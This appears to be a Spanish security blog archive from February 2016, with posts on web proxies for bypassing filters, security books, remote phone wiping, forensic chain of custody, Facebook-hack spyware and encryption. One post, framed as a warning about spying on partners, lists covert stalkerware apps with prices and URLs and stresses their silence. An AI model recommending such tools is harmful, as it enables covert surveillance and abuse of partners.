domingo, 14 de febrero de 2016

8 servicios proxy gratuitos para evitar restricciones y mantener el anonimato y la privacidad

Hace tiempo hablábamos de algunos servicios VPN gratuitos que nos permitían evadir ciertas restricciones de navegación web y mantener la privacidad y el anonimato. Sin embargo, otra alternativa que no podemos obviar es el uso de proxies web, algo más inseguro pero mucho más rápido, primero porque el proxy es un intermediario que sólo enmascara y enrutar tráfico (sin dedicar recursos al cifrado) y segundo y sobretodo porque podemos usarlos sin necesidad de instalar nada, simplemente mediante el navegador web. 



En el blog de EFYTimes podemos encontrar una lista con ocho de los mejores servicios proxy gratuitos:

1. Proxy.org
Proxy.org es la guía pragmática del usuario para mantener la privacidad en línea y la navegación web anónima.

2. Proxify
Proxify es un proxy web que modifica cada página web que visites para que todos sus recursos (como enlaces, imágenes y formularios) apunten a Proxify.

3. XRoxy.com
Ofrece acceso gratuito a una base de datos de proxies abiertos que se actualiza con frecuencia a través de una interfaz de usuario flexible que permite ordenar la lista de proxies por tipo, nivel de anonimato, número de puerto, latencia de la conexión, etc.
 


4. Ninja Cloak
Ninja Cloak es un servicio web proxy gratuito que permite navegar por sitios web de manera anónima e incluso desde detrás de un firewall con los puertos bloqueados.

5. Anonymiser
Ya sea que en casa o en una Wi-Fi pública, Anonymiser Universal mantiene tus actividades online seguras y de manera privada.

6. BlewPass
BlewPass ayuda a evitar los filtros de Internet y firewalls impuestos por la escuela, el trabajo o un país. Manténte a salvo y seguro mientras navegas a través de sus servidores.

7. Dont Filter
Dontfilter.us es un desbloqueador web anónimo y una herramienta de privacidad online. Con este servicio se puede acceder a todos los sitios web que el administrador y/o el país correspondiente no quieren que estés mirando.

8. HideMyAss
Es un servicio web proxy gratuito que permite navegar de forma anónima, ocultar la dirección IP, ocultar el historial de Internet y proteger tu identidad en línea.


EXTRA: NUEVOS PROXIES 


http://navegasinley.com/
https://hidester.com/es/proxy/
https://zapyo.com/
http://proxy.com.es/
- https://hidester.com/es/proxy

viernes, 12 de febrero de 2016

Recopilación de algunos libros “imprescindibles” para aprender seguridad informática

una lista inicial genérica ya que, como todos sabemos, dentro de la ciberseguridad hay muchísimos campos en los que especializarse y no podríamos cubrir completamente todos si decidimos abarcarlos todos, además de que entonces sería una lista .
El resultado de los libros que sugeridos fueron el siguiente:
  • Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning de Gordon “Fyodor” Lyon.
  • A Bug Hunter’s Diary: A Guided Tour Through the Wilds of Software Security de Tobias Klein.
  • Malware, Rootkits & Botnets: A Beginner’s Guide de Christopher C. Elisan.
  • Las colecciones completas de la Liga de la Justicia, Batman y el Escuadrón suicida de DC Comics.
  • Hacking Exposed: Network Security Secrets & Solutions de Stuart McClure, Joel Scambray y George Kurtz.
  • Hacking: The Art of Exploitation de Jon Erickson.
  • BackTrack 5 Wireless Penetration Testing Beginner’s Guide de Vivek Ramachandran.
  • Unauthorised Access: Physical Penetration Testing For IT Security Teams de Wil Allsopp y Kevin Mitnick.
  • Metasploit: The Penetration Tester’s Guide por David Kennedy , Jim O’Gorman , Devon Kearns y Mati Aharoni.
  • Rtfm: Red Team Field Manual de Ben Clark.
  • The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography de Simon Singh.
  • Pentesting con Kali de Pablo González, Germán Sánchez y Jose Miguel Soriano.
  • Metasploit para Pentesters de Pablo González y Chema Alonso.
  • The Database Hacker’s Handbook: Defending Database Servers de David Litchfield , Chris Anley, John Heasman, Bill Grindlay.
  • Owasp Zed Attack Proxy Guide de @BalderramaEric y @sniferl4bs.
  • The Antivirus Hacker’s Handbook de Joxean Koret y Elias Bachaalany.
  • The Rootkit Arsenal: Escape and Evasion de Bill Blunden.
  • Rootkits: Subverting the Windows Kernel de Greg Hoglund y Jamie Butler.
  • The Browser Hacker’s Handbook de Wade Alcorn, Christian Frichot, Michele Orru.
  • Network Security Essentials Applications and Standards de William Stallings.
  • Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers de T.J. O’Connor.
  • Cuadernos Rubio de Ramón Rubio.
  • Android Security cookbook de Keith Makan, Scott Alexander-Bown.
  • The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory Practical Malware Analysis por Michael Hale Ligh , Andrew Case, Jamie Levy, Aaron Walters.
  • Malware Analyst’s Cookbook de Michael Hale Ligh , Matthew Richard , Steven Adair , Blake Hartstein.
  • The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws de Dafydd Stuttard , Marcus Pinto.
  • Official (ISC)² Guide to the CISSP CBK de Adam Gordon.
  • Neuromante de William Gibson.
  • The Cuckoo’s Egg de Clifford Stoll.
  • Hacking Ético de Carlos Tori.
  • Google Hacking for Penetration Testers de by Johnny Long (Author), Bill Gardner (Author), Justin Brown (Author).
  • E-mail Virus Protection Handbook : Protect your E-mail from Viruses, Tojan Horses, and Mobile Code Attacks de by Syngress (Author), James Stanger (Author).
Seguro que podemos ampliar esta lista muchísimo más e intentaremos mantenerla “viva” con vuestras recomendaciones e incluso ordenar el listado por categorías, pero para empezar ya tenemos aseguradas unas buenas horas de buena lectura y aprendizaje. Esperamos que sigán aportando libros interesantes a esta lista.
Por supuesto no hay que olvidar que hay muchísimo material en formatos diferentes al libro que se pueden usar para aprender como papers, artículos en blogs, slides, vídeos de charlas, etc.

jueves, 11 de febrero de 2016

En caso de pérdida o robo, ¿sabes bloquear y borrar tu smartphone a distancia?

Los dispositivos móviles que utilizamos habitualmente suelen contener mucha información personal valiosa así como aplicaciones que acceden a servicios privados tan importantes como nuestro banco o nuestro correo electrónico.
Por tanto, parece una buena idea poder mantener nuestra información a salvo incluso cuando hemos perdido o nos han robado el dispositivo. Esa posibilidad existe para la mayoría de los teléfonos inteligentes actuales de origen, sin la necesidad de instalar ninguna aplicación de terceros.
Sin embargo, según el estudio que hemos realizado mediante encuestas desde nuestro blog, el 27% de los usuarios no conocen la herramienta o no la han configurado.
¿Cuentas con algún método para localizar-borrar-bloquear tu smartphone a distancia en caso de pérdida o robo?
¿sabes bloquear y borrar tu smartphone a distancia?
Los resultados son bastante sorprendentes:
Tres de cada cuatro usuarios no utilizaría el servicio de localización / bloqueo / borrado de su dispositivo a distancia.
Esta herramienta, según el tipo de teléfono de que se trate, vendrá inactiva de origen o deberemos responder adecuadamente durante el asistente inicial de configuración. En Android, el sistema más utilizado actualmente, este servicio viene configurado por defecto solo para permitir la localización y deberemos activar la posibilidad de bloqueo y borrado de datos en el propio dispositivo antes de la posible pérdida o robo para que nos sea de utilidad.
Sea cual sea el sistema utilizado en nuestros dispositivos móviles, nuestro consejo es que todos los usuarios debemos revisar si contamos con esta herramienta correctamente configurada  antes que sea demasiado tarde. Además, para que el sistema de localización funcione, debemos tener activada la opción de ubicación del dispositivo.
Asimismo, en caso de pérdida o robo, también será conveniente conocer qué métodos existen y dónde podemos dirigirnos para localizar, bloquear e incluso borrar nuestros dispositivos móviles a distancia.
A continuación ofrecemos información sobre cómo configurar estas herramientas y dónde dirigirse en caso de necesidad para cada una de los cuatro sistemas operativos predominantes.

Android

Toda la información se puede encontrar en la ayuda específica de Google. Pero veremos de forma resumida cómo podemos activarlo en nuestro dispositivo móvil:
1.- Encuentra la aplicación Ajustes de Google en uno de estos dos sitios (dependiendo del dispositivo):
  • una aplicación independiente llamada Ajustes de Google.
  • en la aplicación Ajustes principal, desplázate hacia abajo y toca Google.
2.- Toca Seguridad.
3.- En “Administrador de dispositivos Android” activa las opciones Ubicar este dispositivo de forma remota y Permitir bloqueo remoto y restablecer datos de fábrica.
¿sabes bloquear y borrar tu smartphone a distancia?
Si necesitamos actuar sobre el dispositivo de forma remota, deberemos acudir a lapágina Web devicemanager, acceder con nuestra cuenta y seleccionar el equipo que queremos buscar. También podemos  utilizar la aplicación Device Manager desde cualquier otro teléfono Android.
En esta entrada anterior de nuestro blog explicamos con detalle el funcionamiento de estas herramientas para Android.

iPhone o iPad

En las páginas de ayuda de iPhone podemos encontrar información para revisar esta configuración.
Es muy sencillo, solo debemos seguir la siguiente secuencia: ‘Ajustes > iCloud > Buscar mi iPhone > Activar’
¿sabes bloquear y borrar tu smartphone a distancia?
Para localizarlo en caso de pérdida o robo, podemos dirigirnos a la sección correspondiente de búsqueda en iCloud con nuestro usuario o utilizar la aplicaciónBuscar mi iPhone desde cualquier otro iPhone o iPad.

Windows Phone

La ayuda de Windows explica cómo utilizar las herramientas para localizar, borrar o bloquear los dispositivos móviles de esta marca.
La configuración puede comprobarse en la aplicación ‘Configuración > Encuentra mi teléfono’.
Para utilizar los servicios a distancia, debemos ir a account.microsoft.com/devices. Si nos pide que iniciemos sesión, usaremos la misma cuenta de Microsoft que usamos para iniciar sesión en el teléfono.

BlackBerry

También estos teléfonos disponen de estas interesantes herramientas. Para que podamos hacer uso de ellas deberemos instalar una aplicación. Toda la información la podemos leer en esta página de soporte.

miércoles, 10 de febrero de 2016

¿Quieres espiar el móvil de tu novi@? Aquí tienes unas cuantas aplicaciones que no deberías utilizar.

 Mucha gente nos ha preguntado acerca de Androrat para troyanizar el smartphone de alguien a quien quieren monitorizar, incluso algunos nos han pedido ayuda directamente para espiar el WhatsApp de su pareja o tener acceso a las llamadas o a sus fotos o videos privados.

Evidentemente no nos hacemos responsables ya que ésto no debe hacerse por ética o moral y en muchos sitios y circunstancias puede tener severas implicaciones legales (lo intentaremos estudiar en detalle más adelante).

No obstante, lo que es una realidad es que no es necesario complicarse la vida e instalar un troyano tipo Androrat o Dendroid para espiar el teléfono móvil de una persona ya que en el mercado hay un buen abanico de aplicaciones que poseen las características necesarias para hacerlo de forma mucho más sencilla, silenciosa y en ocasiones bastante profesional.



Muchas de estas aplicaciones son de control parental para tener vigilados a los menores y otras dicen serlo como "disfraz" para venderse a compradores que saben que precisamente no lo van a usar con sus hijos. Algunas incluso son para gestionar la pérdida o robo de móviles pero perfectamente pudieran usarse para vigilancia. Otras directamente no se cortan y afirman directamente que son para espiar al prójimo.


Para instalar la mayoría necesitarás acceso físico al terminal, lo que equivale a un descuido del dueño en cuestión. La instalación en remoto sería otro cantar... 

En cualquier caso, hemos recopilado algunas de estas aplicaciones que sólo deberías usar para probar y aprender, algunas gratis y muchas de ellas de pago:

Gratis: 

Rastreador Móvil 
URL: https://play.google.com/store/apps/details?id=com.local_cell_tracker

Realiza un seguimiento de todos los lugares que se han visitado en los últimos días con el teléfono. La aplicación recopila información de ubicación una vez cada media hora a través de GPRS / Wi-Fi y por lo tanto el impacto en la batería es mínimo. No es necesario habilitar GPS.

Call Recorder
URL: https://play.google.com/store/apps/details?id=com.appstar.callrecorder

Graba cualquier llamada y elige las que quieres guardar. Puedes elegir las llamadas que se graban y las que se ignoran. Escucha la grabación, añade notas y compártela. La integración con Google Drive and Dropbox permite que las llamadas se guarden o sincronicen con la nube.

Spy Camera OS 2 (SC-OS2)
URL: https://play.google.com/store/apps/details?id=com.jwork.spycamera.free3&source=xda

Herramienta de código abierto que se ejecuta en segundo plano y captura video e imágenes de forma silenciosa, inclyso si la pantalla está apagada.

Prey Anti Robos
URL: https://play.google.com/store/apps/details?id=com.prey&hl=es

Es un ejemplo software más orientado a recuperar un móvil que ha sido robado o perdido, pero perfectamente podría usarse para espiar a un usuario ya que permite de forma silenciosa trazar la ubicación del mismo, tomar fotos e incluso recopilar la información de las redes a las que se conecta. 


De pago:

mSpy!
Precio: 26,99€/mes - a 75,99€/mes
URL: http://www.mspy.com.es

Permite revisar los registros de llamada, ver los chats de la Mensajería Instantánea como WhatsApp, monitorizar la navegación por Internet y escanear el contenido multimedia, revisar los SMS, rastrear ubicaciones por GPS y algunas características más. Es compatible con Android, iOS, Windows y Mac OS y fácilmente accesible desde cualquier navegador.

iKeyMonitor  
Precio: $9.99/mes - $16.66/mes
URL: http://ikeymonitor.es/


iKeyMonitor es un Keylogger para iPhone/iPad/iPod/Android (iOS/Android) que registra SMS, marcaciones, contraseñas, GPS, sitios web y capturas de pantalla y las envía directamente a su email o FTP.

KidLogger 
Precio: gratuito - $19/3 meses
URL: http://kidlogger.net

Kidlogger es una aplicación de control parental que recolecta los datos de la actividad de usuario de su computadora o teléfono móvil
y crea un análisis detallado del uso y la productividad en reportes en línea.

MobiStealth 
Precio: $16.66/mes a $23.33/mes
URL: http://www.mobistealth.com/

MobiStealth es una aplicación de control parental que tiene diferentes costes y paquetes en función de lo que se necesite hacer. Estas funciones van desde la supervisión básica de Internet hasta funciones avanzadas como informes de ubicación GPS incluso cuando el móvil está apagado.

Spyera 
Precio: $189/3 meses
URL: http://spyera.com

Permite espiar llamadas telefónicas de forma tan fácil como enviar un SMS secreto, o habilitándolo de forma online por la web. En el modo silencioso el dueño del teléfono espiado no sabrá que le están escuchando.

FlexiSPY 
Precio: $68/mes - $199/3meses
URL: http://www.flexispy.com/

Tiene un amplio abanico de posibilidades y es uno de los fabricantes pioneros en el espionaje y seguimiento en plataformas móviles. Incluso parece que su aplicación fue usada por un personaje de Mr. Robot en una de sus escenas.

TruthSpy
Precio: $16.99/mes - $22.99/mes
URL: http://thetruthspy.com/

Una vez instalado el software en el dispositivo a monitorizar, TruthSpy registra toda la actividad como los mensajes SMS y la información de las llamadas, junto con las ubicaciones GPS cuando la señal está disponible. Luego las actividades se pueden ver en cualquier navegador, incluso un Mac o un navegador web del teléfono.

PhoneSheriff
Precio: $16.99/mes - $22.99/mes
URL: http://thetruthspy.com/


PhoneSheriff es un software de control parental para teléfonos móviles y tablets. Después de instalar el software protegido por contraseña, bloquea las actividades que se especifican y crea registros de todas las acciones. Existe la opción de mostrar una notificación y un icono para notificar que están siendo monitorizados o no...

Análisis Forense. Cadena de Custodia de la evidencia digital



El concepto Cadena de Custodia (también referenciado en la literatura como CdC) no es algo que solamente se utilice en el entorno del Análisis Forense informático, sino que es un concepto ligado al ámbito legal y judicial, y es algo que incumbe a la recopilación de evidencias de cualquier tipo.

Para entender su importancia pongamos como ejemplo un caso que, desgraciadamente, está a la orden del día: un caso de corrupción.



Cuando la policía y los investigadores entran en la casa del sospechoso, resulta que encuentran un montón de documentación en papel referente a contratos inflados económicamente para estafar a la Administración Pública, por tanto, el sospechoso tiene muchas papeletas de ser culpable. Ahora imaginemos que el encargado de custodiar esas evidencias es amigo íntimo del sospechoso y que no se lleva ningún control de trazabilidad sobre las mismas. Cuando esas pruebas llegan al juez, todos esos contratos que antes eran la prueba de un delito ahora son completamente normales y responden a la más absoluta legalidad, por lo que el juez no tiene más remedio que desestimar la acusación. Para evitar que estas situaciones se produzcan en la realidad existe el concepto de Cadena de Custodia.

La CdC establece un mecanismo o procedimiento, que asegura a quienes deben juzgar que los elementos probatorios (indicios, evidencias o pruebas) no han sufrido alteración o contaminación alguna desde su recolección, examen y custodia, hasta el momento en el cual se presentan como prueba ante el Tribunal. Este procedimiento debe controlar dónde y cómo se ha obtenido la prueba, qué se ha hecho con ella (y cuándo), quién ha tenido acceso a la misma, dónde se encuentra ésta en todo momento y quién la tiene y, en caso de su destrucción (por la causa que sea), cómo se ha destruido, cuándo, quién, dónde y porqué se ha destruido. Este procedimiento de control debe ser absolutamente riguroso, de manera que no pueda dudarse ni por un instante de la validez de la prueba.

Sin embargo, la evidencia digital tiene ciertas peculiaridades con respecto a otro tipo de evidencias, y es que la información que se puede presentar como medio de prueba la podemos encontrar en diferentes estados:
Almacenada estáticamente. Información que se encuentra almacenada de manera persistente en un dispositivo a la espera de ser recuperada o utilizada.
Almacenada dinámicamente o en procesamiento. Información que se encuentra almacenada de manera temporal en un dispositivo volátil y que se perderá en el momento que el dispositivo deje de recibir corriente eléctrica.
En tránsito o desplazamiento. Información que se encuentra en movimiento por la red en forma de paquete de información que puede ser capturado y/o almacenado.

Especialmente de estos dos últimos estados hablaba cuando me refería a las peculiaridades de la evidencia digital. La mayoría de las veces que se habla de CdC se habla de la preservación de la prueba material incautada y relacionada con un delito, pero en informática, ese control de la prueba material carece de sentido cuando hablamos de memorias volátiles, por ejemplo. Pongámonos en el caso de una memoria RAM. La información que contiene puede ser valiosísima a la hora de resolver una investigación (procesos en ejecución, credenciales de usuario, etc.), sin embargo, esta información se perderá en el momento en que la memoria deje de percibir corriente eléctrica, y antes o después el equipo donde esté alojada esa memoria RAM deberá ser apagado. Entonces, ¿qué sentido tiene la cadena de custodia simplemente sobre la memoria RAM como dispositivo físico? Ya respondo yo, ninguno.

Con este pequeño ejemplo se pone de manifiesto que cuando hablamos de CdC no podemos referirnos solamente a las pruebas materiales relacionadas con el delito, sino que hay que hablar también de aquellos datos obtenidos de dispositivos volátiles, y que se generan “sobre el terreno”. Por ejemplo, para preservar la información contenida en un dispositivo volátil de manera que después pueda ser analizada por un experto, habrá que copiar dicha información a un dispositivo no volátil. Ese dispositivo es una prueba generada “in situ” y deberá ser tratada como tal aplicándole el procedimiento de CdC y garantizando su validez legal en un proceso judicial.

Como vemos, la información volátil supone una gran peculiaridad, pero también la información no volátil, por las características propias de las evidencias digitales, supone una disrupción respecto a la definición tradicional de CdC. Por ello, la CdC no debe limitarse únicamente a aquellos dispositivos incautados, sino que debe aplicarse además a todos aquellos dispositivos que, por la razón que fuere, hayan sido duplicados o clonados, con el fin de que estas copias tengan la misma validez legal que la evidencia original. De esta manera, el dispositivo original estará protegido de terceros, en un lugar seguro, y libre de posibles manipulaciones o destrucciones.

De todo lo anterior se desprende una ventaja a la hora de trabajar con evidencias digitales, y es que estas evidencias nos permiten trabajar con copias idénticas de la prueba original, alejando el temor de que una prueba pueda ser contaminada. Y en el caso de que así sea, y una de estas copias idénticas se vea contaminada (por motivos del análisis de la misma en la mayoría de los casos), podrá volver a clonarse el original permitiendo comenzar de cero si fuera necesario. Esto supone una gran ventaja en este aspecto respecto a otros campos (pensemos en el ámbito de la medicina forense).

En resumidas cuentas, de todo esto podemos obtener como conclusión que la definición tradicional de CdC que gira en torno a las pruebas materiales incautadas queda muy “coja” en el entorno de la informática y la evidencia digital. En este sentido, podemos decir que la CdC (en el ámbito de la informática) es el protocolo de actuación relativo a la seguridad y manipulación que ha de seguirse durante el período de vida de una prueba, desde que ésta se consigue o se genera, hasta que se destruye o deja de ser necesaria.

Por último, quisiera hacer mención a la norma ISO/IEC 27037:2012 “Information technology – Security techniques – Guidelines for identification, collection, acquisition and preservation of digital evidence”, que ofrece una guía de cómo llevar a cabo la actuación pericial en el escenario de la recogida, identificación y secuestro de la evidencia digital, y en su capítulo 7 trata la cuestión de la CdC en este ámbito. Esta norma viene a sustituir a las antiguas directrices RFC 3227, norma más dirigida a dispositivos actuales y más acorde con el estado de la técnica actual.

Referencias
López Rivera, Rafael. Peritaje Informático y Tecnológico. Barcelona : s.n., 2012.
http://www.informaticoforense.eu/la-cadena-de-custodia-aplicada-a-la-informatica-i/
http://peritoit.com/2012/10/23/isoiec-270372012-nueva-norma-para-la-recopilacion-de-evidencias/

martes, 9 de febrero de 2016

Herramienta para "hackear" Facebook realmente instala spyware.



Piénsalo dos veces antes de querer 'hackear' la cuenta de algún amigo o conocido de Facebook, ya que estarías exponiéndose a un spyware que hasta hace poco era distribuido por correo electrónico y archivos de Microsoft Office infectados. Una supuesta herramienta para hackear cuentas de Facebook oculta una variante del malware Remtasu, capaz de coleccionar información sensible y enviarla a sus servidores.




El malware en cuestión no es nuevo, pues fue descubierto hace cuatro años. La novedad es que una de sus variantes se ha vuelto popular al distribuirse por un medio aparentemente más efectivo que los correos electrónicos, porque la gente que ignora su existencia está muy interesada en hacerle daño a otros 'hackeando' su cuenta de Facebook, sin embargo, el tiro les podría 'salir por la culata', según el reporte de Softpedia.

La variante Win32/Remtasu.Y fue descubierta hace algunas semanas en el supuesto software de hacking llamado Hack Facebook, disponible para su descarga gratuita. Los usuarios caen en la trampa de sus capacidades y se exponen a un spyware que puede monitorear el uso del teclado, robar información del portapapeles, luego guardar los datos coleccionados localmente y enviarlos a un servidor remoto.

Por si fuera poco, el proceso del malware se inicia junto con el sistema utilizando una técnica bastante conocida. Remtasu se copia a sí mismo en una carpeta llamada InstallDir, ubicada dentro de la carpeta System32 de Windows. Crea una clave de registro que le permite iniciar tras cada reinicio, convirtiéndose en una amenaza persistente para el usuario con malas intenciones, en el doble sentido del enunciado.

De acuerdo con ESET, los países más afectados por infecciones de esta variante de Remtasu se encuentran en América Latina, una lista liderada por el país sudamericano Colombia con el 65%, seguida por el país del sureste asiático Tailandia con el 6%, México con el 3% y Perú con el 2 por ciento. Las infecciones tienen altas posibilidades de éxito cuando el usuario no dispone de un producto antivirus.

La recomendación más inteligente para no ser víctima de este spyware es evitar a toda costa cualquier herramienta que se anuncie con la capacidad de hackear una cuenta de Facebook, desconfiando aún más si está disponible gratuitamente. Siempre se recomienda instalar algún programa antivirus, y las opciones gratuitas están al alcance de todos.

Todo lo básico sobre cifrado: qué es y cuándo deberías usarlo



Para quienes se dedican a la seguridad, conversar con otra gente acerca de estos temas muchas veces es parte del oficio. Y aunque estas conversaciones suelen terminar teniendo una longitud que excede el interés real de ambas partes, a menudo pueden ofrecer una visión sensata sobre las prácticas de seguridad y los procesos de pensamiento de los usuarios reales.

Algo que aprendí con estas charlas es que, quizás más que cualquier otro tema de seguridad, lo que parece confundir a mucha gente es el cifrado. Por lo tanto, vamos a explicar brevemente lo que es y para qué sirve.
Lo que no es el cifrado: una poción mágica de seguridadLA MAYORÍA PARECE PENSAR QUE ES ALGO COMPLICADO QUE SOLO UNA RAZA SUPERIOR DE GENIOS MATEMÁTICOS PUEDE ENTENDER POR COMPLETO

La mayoría de la gente con la que hablo, incluso los que conocen el tema y utilizan el cifrado con regularidad, parece pensar que es algo infinitamente complicado que solo una raza superior de genios matemáticos puede llegar a entender por completo. Y aunque sin duda es una verdadera hazaña crearalgoritmos realmente impenetrables, hay una gran cantidad de tipos simples de cifrado que seguro tú mismo alguna vez aplicaste sin siquiera saberlo.

Para explicarlo con palabras sencillas, es el proceso mediante el cual se codifica algo de modo que no resulte fácil de entender para quienes no tienen acceso autorizado.

Observa la palabra “fácil” en esta oración: muchas personas parecen ver el cifrado como una especie de poción mágica de seguridad que automática e inequívocamente hace que nadie pueda ver el contenido, aparte de los usuarios autorizados. Hay una amplia variedad, y muchos tipos son bastante fáciles de descifrar.
Cuando el cifrado es un juego de niños

La mayoría de los niños en algún momento juega con alguna forma muy simple de cifrado: si alguna vez usaste uno de esos anillos secretos de decodificación que venían como premio en las cajas de cereales, o resolviste un criptograma, estabas jugando con esta técnica. Los anillos de decodificación emplean uno de los métodos más simples, también llamado cifrado por rotación o desplazamiento; consiste en rotar o desplazar el alfabeto algunas letras para obtener el código de descifrado.

Según Suetonio, el emperador romano Julio César a veces lo utilizaba de manera que cada letra sin cifrar se desplaza tres letras más adelante; esto es lo que se conoce como cifrado César.
Texto sin formato ABCDEFGHIJKLMNOPQRSTUVWXYZ
Texto cifrado DEFGHIJKLMNOPQRSTUVWXYZABC


Este es el cifrado César clásico, una “ensalada” César de palabras.
Otro de los cifrados de desplazamiento más populares se conoce como ROT13, que proviene de “rotar 13 lugares”.
Texto sin formato ABCDEFGHIJKLMNOPQRSTUVWXYZ
Texto cifrado NOPQRSTUVWXYZABCDEFGHIJKLM


Como se puede ver, este método desplaza el alfabeto a la mitad, es decir que la misma acción que se utiliza para codificar el mensaje también se puede volver a utilizar para decodificarlo. No es mucho más simple ni más inseguro; en ciertos círculos incluso se utiliza con tanta frecuencia que algunas personas puedan leerlo casi tan fluidamente como el texto sin formato.

Los criptogramas son juegos para decodificar una frase mediante la sustitución de una letra fija por otra. Esto también es bastante sencillo de descifrar, de lo contrario el juego deja de ser divertido. Dado que las letras se pueden utilizar en cualquier orden, no sólo en orden alfabético, su decodificación resulta un poco más compleja que un sistema de cifrado por desplazamiento.

Si alguna vez tuviste un diario secreto de niño, también es posible que hayas creado tu propio sistema. En mi diario de infancia, hice un cifrado utilizando símbolos sin sentido como sustitutos de las letras, de modo que pudiera escribir libremente sin preocuparme por los intrusos (aunque también había escrito la clave en la solapa frontal de ese mismo diario…).


Imagen 1: Cifrado de los hombrecitos bailarines

Estos son métodos muy sencillos de cifrado que también son fáciles de deshacer (¡especialmente si dejas la clave a la vista como hice yo!). Pero también hay otros tipos de cifrado que son efectivamente imposibles de deshacer con la capacidad de cálculo limitada de los equipos actuales. Sin embargo, la mayoría son como los que utilizas a diario: se encuentran en algún punto entre estos dos extremos en términos de complejidad, son muy difíciles de descifrar para cualquiera que no sea el adversario más decidido, pero no son tan exhaustivos como para que el proceso lleve toda una vida.
¿Cuándo se utiliza el cifrado?

En términos generales, hay dos circunstancias en las que deberías usar el cifrado: cuando los datos están “en tránsito” o cuando están “en reposo”. “En tránsito”, en este contexto, es cuando envías información a través de Internet, por correo electrónico, o cuando necesitas almacenarla en otro lugar que no sea tu propio dispositivo. Los datos se consideran “en reposo” cuando se encuentran almacenados en tu dispositivo, ya sea en una parte integrada como un disco rígido, o en un medio extraíble, como una unidad USB.

Al cifrar los datos en tránsito, esencialmente estás haciéndolo para tratar de disuadir a las personas que intentan escuchar tu conversación. Una de las formas más comunes es el cifrado del tráfico de red. Una gran cantidad de sitios web, en particular los sitios financieros, de redes sociales y de correo electrónico, ahora lo utilizan por defecto.

No hay que hacer nada especial para usarlo. Cada vez que ves un ícono de un pequeño candado en la parte superior a la izquierda del nombre de la página, o si usas una dirección web que comienza con HTTPS (en lugar de HTTP), significa que se están cifrando tus datos. La S de HTTPS significa “seguro”, es decir que tus datos están cifrados, lo que aumenta la seguridad de su transmisión entre tu equipo y ese sitio web en particular.

Todos los principales sistemas operativos, así como muchas aplicaciones de software populares, te dan la opción de cifrar los archivos o las carpetas de tu dispositivo. Si usas esta opción, deberás elegir una contraseña que te permita (a ti y a cualquier otra persona con la que compartas la contraseña) desbloquear y descifrar esos archivos.
Datos en uso

El cifrado es excelente para resguardar los datos almacenados o en tránsito, pero hay otra situación que se torna un poco polémica: cuando el documento cifrado está en uso. Es decir, cuando ya abriste ese documento protegido y lo estás mirando o editando. Esto incluye cualquier momento en el que el archivo cifrado está abierto, incluso cuando está minimizado o aunque su vista esté cubierta por otra ventana.

Desbloquear el archivo significa que fue descifrado en la memoria del dispositivo. Si, por ejemplo, alguien usó un backdoor para abrir una puerta trasera en el equipo, podría acceder a esos datos, siempre y cuando sigan desbloqueados. Esto no quiere decir que el cifrado deje de ser efectivo: de hecho, el uso extensivo del cifrado limita en gran medida la cantidad de daño que un atacante puede hacer y además reduce la ventana de tiempo en la que el atacante tiene acceso a tus datos descifrados.

Es por eso que a menudo nos escucharás decir que lo mejor son las defensas en varias capas:de esa forma, una tecnología ayuda a reforzar la eficacia de la otra, ya que cada una restringe las oportunidades que tiene el atacante para robar datos.

Sigue leyendo: Preguntas y respuestas sobre el cifrado de la información personal

lunes, 8 de febrero de 2016

Adquisición de evidencia forense informática

La alteración de evidencias podría suceder incluso en remoto, pues en algunos dispositivos es posible hacer un reset de fábrica, un borrado o un bloqueo del terminal, simplemente enviando un mensaje. Además, las llamadas o los datos entrantes estarían contaminando las pruebas. Incluso si no hay evidencia de que esto haya sucedido, el simple hecho de que se tenga constancia de la existencia de vulnerabilidades asociadas al dispositivo, que pudieran ser explotadas para contaminar las evidencias, podría poner en evidencia la validez de las mismas. 
Por otra parte, existe también el riesgo de que, si el teléfono está infectado con malware, éste se propague por la red a la que se conecte el teléfono. Y aún más grave sería la posibilidad de que se trate de un teléfono bomba que pueda ser detonado en remoto.


Así pues, hay que aislar el terminal de cualquier tipo de red inalámbrica; lo que puede hacerse de alguna de las siguientes maneras:
- Poniéndolo en modo avión.
- Apagándose. Pero esto tiene el riesgo de que luego, al encenderlo, nos pida el pin y no podamos acceder a él para obtener las evidencias. Por ello, siempre es mejor dejarlo encendido y conectarlo a la corriente para que no se agote la batería.
- Guardándolo en una caja de Faraday.
- Sustituyendo la SIM por una CNIC (Cellular Network Isolation Card): esto permite que el teléfono siga encendido pero que no tenga conexión con la red de telefonía.
- Pidiéndole a la compañía telefónica que lo saque de la red o haciéndo nosotros mismos un jamming/spoofing del dispositivo (emitir una señal más fuerte que la de la torre que envíe un
no-carrier<"> al teléfono). Por supuesto, hay que tener en cuenta las implicaciones legales que estos dos métodos pueden tener. Normalmente son las Fuerzas y Cuerpos de Seguridad del Estado (u otros organismos estatales) los que podrán hacer eso, previa autorización judicial.


Otra buena guía es el manual de buenas prácticas de la ACPO (Association Of Chief Police Officers): Good Practice Guide for Computer-Based Electronic Evidence.



Por ejemplo, explica que de un ordenador en funcionamiento se pueden extraer detalles de la conexión a la red y datos de la memoria volátil. Es decir: procesos y servicios en ejecución, información del sistema, información de autoarranque, información del registro, puertos abiertos, puertos cerrados y puertos en escucha, ARP caché, aplicaciones desencriptadas, usuarios y contraseñas y código residente en memoria, entre otras cosas.


Esta información es importante porque permite comprender mejor qué estaba sucediendo en el ordenador en un momento determinado y complementa a la que se pueda extraer del disco. Por ejemplo, una de las cosas que se pueden investigar con los datos de la memoria volátil es la presencia de una puerta trasera abierta por un troyano.


Para recuperar la memoria volátil se puede utilizar un live-USB con las herramientas forenses adecuadas. Los pasos a seguir son:


- Conectar el USB.
- Ejecutar el script con las herramientas.
- Expulsar el USB.
- Desconectarlo.
- Ahora el sistema ya se puede apagar y el USB donde se ha guardado la información se conecta al equipo forense para analizarla, por ejemplo con Volatility.




No siempre es necesario acudir físicamente con las herramientas forenses al puesto a analizar. También se puede obtener información «al vuelo» desde la red a la que el equipo está conectado si está instalado un agente de software forense.

Otros dispositivos que también se pueden utilizar para obtener información de la conexión de red del dispositivo que se está analizando son los routers y firewalls (cortafuegos). Y puede consultarse desde consola.

Espero que os hayan gustado estas entradas como una pequeña introducción a la gestión de incidentes y adquisición de evidencias.


